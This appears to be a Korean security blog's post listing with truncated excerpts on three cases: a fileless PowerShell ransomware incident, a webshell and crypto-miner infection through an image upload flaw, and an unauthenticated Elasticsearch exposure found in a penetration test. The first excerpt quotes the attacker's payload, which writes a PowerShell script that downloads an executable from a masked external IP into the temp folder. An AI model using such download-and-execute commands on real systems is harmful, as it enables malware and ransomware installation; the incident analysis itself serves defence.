SECURITY/해킹사고 사례

[해킹사고사례] 파일리스 공격 / Powershell fileless

파워쉘 파일리스 악성 코드 감염 사례 피해 사례 xxx 솔루션 사용 고객사 동일한 공격 벡터로 다수 서버 랜섬웨어에 감염 해커가 사용한 공격 방법 보안 취약점을 이용하여 원격 명령 실행 / 파월쉘 스크립트 실행 공격 벡터(보안 홀, 보안 취약점)는 민감 사항으로 기술 하지 않겠습니다. 현재는 취약점 보완 조치 완료됨. 원격에서 powershell script 실행 페이로드 "echo $client = New-Object System.Net.WebClient > %TEMP%\qaestaxxx.ps1 & echo $client.DownloadFile("http://1xx.5x.xx6.x7/ZdfxxxgU.exe","%TEMP%\0VCxxxE.exe") >> %TEMP%\qaestaxxx.ps1 & power..

2022. 2. 10. 10:16

SECURITY/해킹사고 사례

[해킹사고사례] 웹쉘 webshell 감염 사례

파일업로드 취약점 / webshell 해킹 감염 사례 사고 개요 XX업체 XX서비스 webshell, Miner 코드 감염 침해사고 요약 웹서비스내 이미지 파일 업로드 페이지 취약점을 이용 웹쉘 및 악성코드 설치 웹쉘 파일 srv.aspx , s.aspx Miner 채굴 코드 sqlservr.exe XX업체 XX서비스 운영 서버내 “webshell” 및 “Miner 코드” 감염 확인 상세 분석 웹쉘 파일 http request 화면 a. srv.aspx (/..../.../.../common/srv.aspx) x월 13일 오후 16:01분경 최초 생성 IIS 웹로그 출발지는 중국 IP / 시간은 GMT +9 2019-03-13 07:01:37 X.1X.1X.1X POST /..../.../.../comm..

2022. 2. 9. 14:44

SECURITY/모의해킹 취약점분석

[모의해킹/취약점분석] elastic 인증 취약점

Elastic 인증 취약점 1. 점검 개요 취약점 진단 대상 : ealsticsearch 기반 XX 서비스 취약점 분석 및 모의해킹 2. 취약점 점검 결과 요약 1) A05: Security Misconfiguration (보안 설정 오류) elasticsearch API 서비스 PORT 9200 외부 ANY 오픈 2) A07: Identification and Authentication Failures(식별 및 인증 실패) elasticsearch 사용자 인증 미설정 약 20여대 XX 서비스 서버 동일 취약점 발견 3. 점검 상세 내용 1) 엘라스틱 접근 통제 미흡 2) message 및 대화 내용 등이 저장되는 엘라스틱 서비스 접근통제 미흡 취약점 발견 3) 인증 없이 Elastic API Port ..

2022. 2. 8. 10:22